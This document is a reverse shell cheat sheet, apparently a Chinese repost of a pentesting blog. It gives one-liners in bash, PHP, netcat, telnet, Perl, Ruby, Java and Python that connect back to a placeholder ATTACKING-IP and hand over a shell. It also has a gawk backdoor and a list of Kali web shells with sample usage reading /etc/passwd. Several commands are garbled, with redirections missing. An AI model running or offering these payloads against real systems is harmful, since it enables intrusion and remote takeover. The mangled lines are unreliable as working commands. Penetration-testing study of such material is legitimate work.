Reverse Shell Cheat Sheet
使用Netcat本地监听一个允许的合法端口,如80/443
root@kali:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ...
注:如果你正在攻击反弹的机器在NAT路由网络里面,那么你需要开启端口转发才能访问到那个网络,比如metasplioit里面的port_forward模块
Bash Reverse Shells
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java Reverse Shell
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Gawk Reverse Shell
#!/usr/bin/gawk -fBEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}}
Kali Web Shells
Kali PHP Web Shells
| /usr/share/webshells/php/php-reverse-shell.php | Pen Test Monkey - PHP Reverse Shell |
/usr/share/webshells/php/php-findsock-shell.php /usr/share/webshells/php/findsock.c |
Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80 |
| /usr/share/webshells/php/simple-backdoor.php | PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple- backdoor.php?cmd=cat+/etc/passwd |
| /usr/share/webshells/php/php-backdoor.php | Larger PHP shell, with a text input box for command execution. |
Kali Perl Reverse Shell
| /usr/share/webshells/perl/perl-reverse-shell.pl | Pen Test Monkey - Perl Reverse Shell |
/usr/share/webshells/perl/perlcmd.cgi |
Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd |
Kali Cold Fusion Shell
| /usr/share/webshells/cfm/cfexec.cfm | Cold Fusion Shell - aka CFM Shell |
Kali ASP Shell
| /usr/share/webshells/asp/ | Kali ASP Shells |
Kali ASPX Shells
| /usr/share/webshells/aspx/ | Kali ASPX Shells |
Kali JSP Reverse Shell
| /usr/share/webshells/jsp/jsp-reverse.jsp | Kali JSP Reverse Shell |
原文链接地址:https://highon.coffee/blog/reverse-shell-cheat-sheet/
其他的一些关于转发反弹总结的文章:
渗透测试:反弹与转发小结 - Reverse Shell During the Penetration Test: http://le4f.net/post/post/reverse-shell-during-the-penetration-test
两位博主的博客上还有一些不错的东西,能够多读读有益无害。